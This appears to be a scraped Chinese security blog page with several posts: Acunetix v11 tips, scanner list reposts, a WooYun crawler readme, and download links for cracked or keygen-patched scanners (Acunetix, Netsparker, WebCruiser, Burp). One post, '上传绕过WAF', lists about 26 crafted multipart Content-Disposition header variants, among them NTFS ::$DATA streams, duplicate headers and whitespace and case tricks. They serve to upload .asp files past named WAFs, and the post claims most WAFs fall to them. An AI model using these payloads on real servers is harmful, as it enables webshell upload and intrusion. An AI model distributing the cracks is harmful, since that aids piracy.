欢迎光临
我们一直在努力
"

关于Acunetix v11 WebUI下不得不说的事情!

legend阅读(1310)评论(0)

上了官网把介绍Quick-start影片看了一下,脑中浮现不少疑问.

有些功能就像跟你玩捉迷藏一样的不知藏到哪里去了,以下分别针对Web UI及CLI (wvsc.exe)的功能做了一些整理:

1. AWVSV11装完以后在哪里?

WEB:

https://loaclhost:3443/

WVSC:

C:\Program Files (x86)\Acunetix 11\core\wvsc.exe

2. AWVSV11扫完以后为什么只能汇出PDF或HTML啊???其实…

在新增Target时,开启Debug scans功能,让世界更美好(误)

https://4.bp.blogspot.com/-jFlj48MnXE4/WO4sPTU6unI/AAAAAAAADf4/jiBVNsUfTGgayb9En1o_RUWmXwK8eR0HQCLcB/s1600/report.png

Targets -> Advanced -> Debug scans for this target (打勾)

https://4.bp.blogspot.com/-sf4DX1hF5wM/WO4nMQ7ZNmI/AAAAAAAADfg/42WN9W6lTcEUpGsCcIQDrLNxB_fTIMG1ACLcB/s1600/debugscan.png

之后扫完便会产出三个文件(logfile.csv, results.wvs, settings.xml),放在 C:\ProgramData\Acunetix 11\shared\scans\ 底下,并以zip储存。

https://3.bp.blogspot.com/-XCAOQ87tZzA/WO4nwOBnmvI/AAAAAAAADfo/LRKlYOTRGKcbrg_h8KVfRu2jeoRHBqJ8QCLcB/s1600/sharedscans.png

(WVSC)相较于使用Web UI可以汇出多种格式的结果档,CLI却只提供/save results.wvs的功能。
3. 那若是爬完或扫描完想【导出XML】呢?

Scans -> (点选任一个Scan项目) -> Export to… -> XML

https://4.bp.blogspot.com/-Lzp3Rz5Mqvc/WO4lcCXyMVI/AAAAAAAADfQ/aelQbX3M3uwLAHfEHgxdZOguvnGIahs5gCLcB/s1600/exporttoxml.png

(WVSC)也是没有这个功能…。

 

4. AWVSV11的【爬站】功能哪去了?

Choose Scanning Options -> Scan Type 选择 Crawl Only

https://3.bp.blogspot.com/-gVxRqf_4wa0/WO7fqZYzMLI/AAAAAAAADgI/rJDH9IPBz-I5_xVeuXPWMvtox-OyZD2XwCLcB/s1600/crawlonly.png

(WVSC)这还真是个不能说的秘密,看到指令集里完全没有提及有/crawl相关指令时我心都凉一半了,但经过测试发现,嘿嘿,关键在于指定profile。

在执行Scan或Crawl时,都是使用 /scan,差别在于要完整扫描时,会使用/scan <target> /profile Default,而纯爬站时则使用/scan <target> /profile empty.profile。

例如:

完整扫描

wvsc.exe /scan http://testphp.vulnweb.com /profile Default /log logfile.txt /ls my.lsr /save results.wvs

使用XSS模块扫描

wvsc.exe /scan http://testphp.vulnweb.com /profile xss /log logfile.txt /ls my.lsr /save results.wvs

纯爬站

wvsc.exe /scan http://testphp.vulnweb.com /profile empty.profile /log logfile.txt /ls my.lsr /save results.wvs

多亏了开启Debug scans选项,从log文件看出端倪啦!

5. 如果我想扫描【WebService】呢?

v10.5还有特别独立出来的Web Services功能(Scanner & Editor),但在AWVSV11已经完全找不到踪影。

尝试直接在AWVSV11 Add Target时输入Web Service URL然后启动扫描,并无任何问题。

(让我抱怨一下,玩了好久才发现文件夹的图示,是可以展开的,但前提是一定要点到那个”图标”而不是文字)

另外从log中可看到爬站时能确实辨别WSDL,参考v10.5预设用于Web Services的Profile (ws_default),发现其实所使用的Script与一般的网站扫描无异,只是少了很多XD。

https://3.bp.blogspot.com/--xAPNPck330/WO9BERKDHTI/AAAAAAAADg0/C7MuBEQdw9Qf6-z6U7bQ3KaOqoeiB0uagCLcB/s1600/log_wsdl.png

参考v10.5,Default的Profile为全部勾选,而ws_default只有在PerScheme类别部分勾选而已。
https://1.bp.blogspot.com/-8hKEBkS1yhY/WO9BU-OhdtI/AAAAAAAADg8/MKBVEDU3pMo_iXQxEYwQEbvJw2S_OWpfQCLcB/s1600/ws_default.png

6. AWVSV11的手动检测工具呢?

它们被拆散了,请到官方提供的这里另行下载安装。

安装后可用的手动检测工具包含HTTP Editor、HTTP Sniffer、HTTP Fuzzer、Blind SQL Injector等。

7. 忘记AWVSV11 Web登入密码了..?

安可以去开始菜单Acunetix 11找「Acunetix 11 Administrative Password」,可以直接重设密码。

总之,本次Acunetix大改版,最潮的就是那华丽的Web UI,然后打个比喻原本若是50个功能现在大概只找的到10了吧。

除此之外还有一些显而易见的特色功能:

Dashboard

在扫描期间发现的其他网站,会直接列在Discovered Hosts区块,方便直接create Target。

https://4.bp.blogspot.com/-JYwLcRqXQlM/WO4mx8bCBQI/AAAAAAAADfc/vBovdHEX02w7d4Oha-je5lYSMJhLdppTQCLcB/s1600/discoveredhosts.png

 

Continuous Scanning

目的是让受测系统一直保持在安全状态,所以提供此功能让该Target会自动一周进行一次Full Scan。
Targets -> (选择或新增Target) -> General -> Target Info -> Continuous Scanning (开启)
https://3.bp.blogspot.com/-VgefvtmXnBY/WO74fnsDY5I/AAAAAAAADgg/7B9BaQgaTuImRN2kHKTrDXX_JvDGYHbXQCLcB/s1600/contiscan.png
Role-based multi-user system

AWVSV11提供了一个新的角色概念,让执行扫描及产出报告的动作可由不同角色执行,详细请参考这里。此功能仅支持Enterprise licensed用户。

 

Acunetix CLI可用指令
【Acunetix 11】wvsc.exe
https://2.bp.blogspot.com/-EQxmRgYPq6A/WO2KGW3KmbI/AAAAAAAADe8/JWE2QizOfIIbgBDz-TBAf5AUbVRzQZtEACLcB/s1600/help_10_wvs_console.png

【Acunetix 10】wvs_console.exe

https://1.bp.blogspot.com/-yskDE1iEp0A/WO734imId4I/AAAAAAAADgY/ncGdDJr2lwc3JduUAn5-oykyOh5yAW7kgCLcB/s1600/help_10_wvs_console.png

Acunetix Version: 11.0.170951158(5 April 2017) & 10.5 Build 20160520

参考数据:

Acunetix AWVSV11 Product Manual

Acunetix Web Vulnerability Scanner Command Line Operation

Acunetix Support – Help and Documentation

 

转载请注明: 转载自Legend‘s BLog

本文链接地址: 关于Acunetix v11 WebUI下不得不说的事情!

Acunetix Web Vulnerability Scanner 11.x Service Provider License KeyGen By Hmily[LCG]

legend阅读(1374)评论(0)

Audit your website security
Firewalls, SSL and hardened networks are futile against web application hacking!
Hackers are concentrating on web-based applications (shopping carts, forms, login pages, etc) – accessible 24/7 – and directly connected to your database backends with valuable data. Web applications are tailor-made, less tested than off-the-shelf software and likely to have undiscovered vulnerabilities that can be a recipe for disaster. Don’t overlook Website security at your organization!

Acunetix is the leading web vulnerability scanner used by serious fortune 500 companies and widely acclaimed to include the most advanced SQL injection and XSS black box scanning technology. It automatically crawls your websites and performs black box AND grey box hacking techniques which finds dangerous vulnerabilities that can compromise your website and data.

Acunetix tests for SQL Injection, XSS, XXE, SSRF, Host Header Injection and over 3000 other web vulnerabilities. It has the most advanced scanning techniques generating the least false positives possible. Inbuilt vulnerability management helps you prioritize and manage vulnerability resolution.

In depth crawl and analysis – automatically scans all websites
Highest detection rate of vulnerabilities with low false positives
Integrated vulnerability management – prioritize & control threats
Integration with popular WAFs and Issue Trackers
Free network security scanning and Manual Testing tools
Available on premise and online


注:补丁必须解压出来运行才可以,禁止直接在压缩包中打开。如果补丁界面字体挡住按钮,请将系统字体DPI调成正常,重新打开补丁即可。

使用说明:由于官方下载正版不敢提供直接升级了,所以只有等小伙伴分享出来,再把正版安装包放网盘吧,由于官方的试用版是不带有注册功能的,建议先卸载老版本,再通过论坛下载最新的企业版安装包安装,安装完成后打开破解补丁,点Patch后可正常注册了,注册后支持正常升级。

原版下载地址(官方不支持升级啦,以后有小伙伴分享新版我会更新到这里):
链接:http://pan.baidu.com/s/1c1JoyBm 密码:hyue【由于之前被举报无法分享,这次原文件和补丁都加了压缩密码:www.52pojie.cn】

Acunetix Web Vulnerability Scanner 11.x Service Provider License KeyGen By Hmily[LCG].exe
MD5: 52BC7C27598D86197DC5EC4663DFF214
Acunetix_Web_Vulnerability_Scanner_11.x_Service_Provider_License_KeyGen_Hmily[LCG].rar
MD5: C7F99094664FCE1FBF20CC5456D97F90

请勿用于非法用途,测试后请尽快删除。

百度云盘下载(解压密码:www.52pojie.cn):
链接: https://pan.baidu.com/s/1dEE26Ff 密码: x8p1

Scanners-Box:开源扫描器大全 2017-04-22

legend阅读(1530)评论(0)

Scanners-Box是一个集合github平台上的安全行业从业人员自研开源扫描器的仓库,包括子域名枚举、数据库漏洞扫描、弱口令或信息泄漏扫描、端口扫描、指纹识别以及其他大型扫描器或模块化扫描器;该仓库只收录各位网友自己编写的一般性开源扫描器,类似nmap、w3af、brakeman等知名扫描工具不收录


子域名枚举

数据库扫描

弱口令或信息泄漏扫描

物联网设备扫描

XSS扫描

企业网络自检

webshell检测以及病毒分析工具

内网渗透

端口扫描、指纹识别以及中间件扫描

专用扫描器

无线网络渗透、扫描

代码静态扫描、代码运行栈跟踪

模块化扫描、综合扫描器

APT


收集目的

本仓库收集的初衷是为向各类企业安全从业人员提供在企业信息安全防护体系建设过程中可以参考的开源安全扫描工具,以期望企业能够利用这些扫描器对自身业务进行自检,从而提高自身业务安全性

项目维护

Wester(sina weibo @西风微雨_Wester) && Martin(sina weibo @Mart1n_ZHOU)

转载 https://github.com/We5ter/Scanners-Box

转载请注明: 转载自Legend‘s BLog

本文链接地址: Scanners-Box:开源扫描器大全 2017-04-22

Netsparker 4.8.1.14376 Crack

legend阅读(1858)评论(0)

更新日志:
为Apache Struts框架漏洞添加了新的漏洞检查。
改进

为“抓取的网址列表”,“扫描的URL(s)列表”和“漏洞列表”报告模板添加了JSON格式选项。
MySQL数据库改进的盲注SQL注入检测。
修复

修复了针对根证书报告的不正确的弱签名算法。
修复了报告策略编辑器上的破坏的编辑功能。
修复扫描期间的空活动列表问题。
修复了导入扫描时缺少的自定义Cookie问题。

下载地址:http://pan.baidu.com/s/1cs2Mlw 密码:50mq

转载请注明: 转载自Legend‘s BLog

本文链接地址: Netsparker 4.8.1.14376 Crack

上传绕过WAF

legend阅读(1462)评论(0)

默认状态
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破0
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”[0x09]a.asp”
Content-Type: text/html[/mw_shl_code]

突破1 去掉双引号
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=a.asp
Content-Type: text/html[/mw_shl_code]

突破2 添加一个filename1
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”;filename1=”test.jpg”
Content-Type: text/html[/mw_shl_code]

突破3 form中间+
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: f+orm-data; name=”filepath”;filename=”test.asp”
Content-Type: text/html[/mw_shl_code]

突破4 大小写
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破5 去掉form-data
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破6 在Content-Disposition:后添加多个空格 或者在form-data;后添加多个空格
[mw_shl_code=bash,true][mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code][/mw_shl_code]

突破7 a.asp . (空格+.)
[mw_shl_code=bash,true][mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp .”
Content-Type: text/html[/mw_shl_code][/mw_shl_code]

突破8 “换行
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp

Content-Type: text/html[/mw_shl_code]

突破9 NTFS流
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”test.asp::$DATA”
Content-Type: text/html

——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”test.asp::$DATA\0x00\fuck.asp0x00.jpg”
Content-Type: text/html[/mw_shl_code]

突破10 经过对IIS 6.0的测试发现,其总是采用第一个Content-Disposition中的值做为接收参数,而安全狗总是以最后一个Content-Disposition中的值做为接收参数。因此尝试构造如下请求[上传test.asp成功]:
[mw_shl_code=bash,true]Content-Disposition: form-data; name=”FileUploadName”; filename=”test.asp”

—————————–15377259221471

Content-Disposition: form-data; name=”FileUploadName”; filename=”test.txt”

Content-Type: application/octet-stream

Content-Disposition: form-data; name=”FileUploadName”; filename=”test.asp”
Content-Disposition: form-data;
name=”FileUploadName”; filename=”test.asp”[/mw_shl_code]

突破11 换位
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Type: text/html
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp”[/mw_shl_code]

       在上述的方法中,还有些方法可以过安全狗,也可以过D盾、360网站卫士等等。另外从上述方法中,若按你们的想法,会分成那些类型?我在这里统一划分为特性和WAF解析不当(PS下,我不是学术派,较口语化)i,特性包括系统特性,协议特性等等,比如上述中,大多数都属于协议的特性,因为FORM-DATA的协议十分松散;部分属于系统特性,比如加空格、点号、NTFS流等等。而解析不当,比如上述的第二种添加一个filename1,这种在正常情况下无法使用的,如果第0种,对特殊字符无法解析,归根到底也是WAF对内容解析的不当处理。
针对于特性,在上传这一块,好像能用到的就只有系统特性和协议特性,系统特性从系统出现到现在才挖掘出那么一点点,对于我等菜鸟而言,就更难挖掘了。于是我们就把目光放到协议上。

默认状态
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

上述方法我们已经开始测试,那么,有没有想过。既然你们想得到用window特性来+空格,有没有想过用协议来+-空格

突破方法001
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition:form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法002
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition:  form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法003
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type:text/html[/mw_shl_code]

突破方法004
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename= “a.asp”
Content-Type:text/html[/mw_shl_code]

突破方法005
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data;  name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

上述就5种方法了,然后呢,空格可以,谁可以代替空格,tab?咱们来试试
突破方法006
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition:     form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法007
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data;      name=”uploaded”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法008
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=    “a.asp”
Content-Type: text/html[/mw_shl_code]

上面的方法可以延伸很多种了,记住一点,什么可以替换空格!

接下来,我们在根据之前公布的方法 ,大小写
突破方法009
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法010
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: Form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法011
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; Name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法012
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; Filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法013
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-type: text/html[/mw_shl_code]

然后,这里在针对一个漏洞结合下,记得form-data中见存在一个+号吗,为什么不能放到前面或者后面

突破方法014
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: +form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法015

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data+; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

        列举了15种方法,不过也才3个技巧,我们也仅仅拿安全狗做演示,但是方法可以绕过目前大部分waf了,即使防住了,结合下有时候会出现超乎想像的结果。另外说下,其他的方法,还有不下20种,我记得某一妹子和我讲过,hack技术在于mind,不受约束,你会发现更多好玩的。
对于解析这块,就靠大家自己去fuzz了,放出来就淹死啦!

转载请注明: 转载自Legend‘s BLog

本文链接地址: 上传绕过WAF

WebCruiserWVS 3.5.4特别版

legend阅读(1392)评论(0)

WebCruiser Web漏洞扫描器,一个有效和强大的Web渗透测试工具,将帮助您审计您的网站!
它可以支持扫描网站以及POC(概念验证)的Web漏洞:SQL注入,跨站脚本,本地文件包含,远程文件包含,重定向,废弃备份等。
与其他Web漏洞扫描程序相比,WebCruiser最典型的功能是WebCruiser Web漏洞扫描程序专注于高风险漏洞,WebCruiser可以单独扫描指定的漏洞类型,指定的URL或指定的页面,而其他通常不会 。

WebCruiser Web Vulnerability Scanner V3.5.4新功能:CSRF令牌的强力工具优化。

首先说明毕竟国人写的支持下国货如果喜欢请支持正版,工具很小巧,方便所以我一直都在用。发现没人发布最新版的然后就顺手放出我自己crack的版本,给需要的人吧!

原版也附带一起打包。欢迎大家一起交流!

具体使用说明,已内置—_—!

链接:http://pan.baidu.com/s/1eSMJhcA 密码:fgdr

转载请注明: 转载自Legend‘s BLog

本文链接地址: WebCruiserWVS 3.5.4特别版

安全行业从业人员自研开源扫描器合集

legend阅读(2878)评论(0)

简介

Scanners-Box是一个集合github平台上的安全行业从业人员自研开源扫描器的仓库,包括子域名枚举、数据库漏洞扫描、弱口令或信息泄漏扫描、端口扫描、指纹识别以及其他大型扫描器或模块化扫描器;该仓库只收录各位网友自己编写的开源扫描器,类似nmap、w3af、brakeman等知名扫描工具不收录。

Author:We5ter,Martin

项目主页:https://github.com/We5ter/Scanners-Box

非常欢迎大家贡献commit!

子域名枚举类

数据库漏洞扫描类

弱口令或信息泄漏扫描类

xss扫描器

企业网络自检

端口扫描、指纹识别类

专用扫描器

综合类

*转载请注明来自MottoIN

转载请注明: 转载自Legend‘s BLog

本文链接地址: 安全行业从业人员自研开源扫描器合集

Burp 1.7.1双手奉上

legend阅读(1472)评论(0)

1480924498-7286-1-31

 

众所周知,Burp Suite是响当当的web应用程序渗透测试集成平台。从应用程序攻击表面的最初映射和分析,到寻找和利用安全漏洞等过程,所有工具为支持整体测试程序而无缝地在一起工作。平台中所有工具共享同一robust框架,以便统一处理HTTP请求、持久性、认证、上游代理、日志记录、报警和可扩展性。
BurpSuite允许攻击者结合手工和自动技术去枚举、分析、攻击Web应用程序。

1480924496-1429-1-32

具体新增那些个功能自己查看~~~~

下载地址
链接: 链接: https://pan.baidu.com/s/1eS9iijS 密码: g643
解压密码 secz.org

转载请注明: 转载自Legend‘s BLog

本文链接地址: Burp 1.7.1双手奉上

乌云公开漏洞、知识库爬虫和搜索(下面有彩蛋)

legend阅读(5105)评论(0)

wooyun_public

crawl and search for wooyun.org public bug(vulnerability) and drops

index search

1.安装相关组件

  • python 2.7和pip
  • mongodb
  • scrapy (pip install scrapy)
  • flask (pip install Flask)
  • pymongo (pip install pymongo)

2.爬虫

  • 在爬取内容时,请先启动mongodb数据库:mongod &
  • 乌云公开漏洞和知识库的爬虫分别位于目录scrapy/wooyun和scrapy/wooyun_drops
  • 运行scrapy crawl wooyun -a page_max=1 -a local_store=false -a update=false,有三个参数用于控制爬取:

    -a page_max: 控制爬取的页数,默认为1,如果值为0,表示所有页面

    -a local_store: 控制是否将每个漏洞离线存放到本地,默认为false

    -a update:控制是否重复爬取,默认为false

  • 第一次爬取全部内容时,用scrapy crawl wooyun -a page_max=0 -a update=true
  • 平时只爬取最近的更新时,用scrapy crawl wooyun -a page_max=1,可以根据自己的爬取频率和网站更新情况调整page_max的值
  • 全部公开漏洞的列表和每个漏洞的文本内容存在mongodb中,大概约2G内容;如果整站爬全部文本和图片作为离线查询,大概需要10G空间、2小时(10M电信带宽);爬取全部知识库,总共约500M空间。(截止2015年10月)

3.搜索

  • 漏洞搜索使用了Flask作为web server,bootstrap作为前端
  • 在搜索时,请确定已启动了mongodb数据库:mongod &
  • 启动web server :在flask目录下运行python app.py,默认端口是5000
  • 搜索:在浏览器通过http://localhost:5000进行搜索漏洞,多个关键字可以用空格分开。

4.为mongodb数据库创建索引(可选,以下为命令行操作)

5.虚拟机

  • 虚拟机1:在2016年6月底爬的wooyun全部漏洞库和知识库内容,总共30G。上传的文件有点问题,分卷有错误,我正在重新上传一次,7月29号应该能传完,请暂时不要下载这一个!请暂时不要下载这一个!请暂时不要下载这一个!(网盘地址为: http://pan.baidu.com/s/1o7IEaAQ 提取密码:d4cq)
  • 虚拟机2:已打包了一个安装了所有组件和程序的虚拟机(不包含具体内容),网盘地址为:http://pan.baidu.com/s/1sj67KDZ 密码:bafi
  • 使用方法:

6.其它

无觅相关文章插件,快速提升流量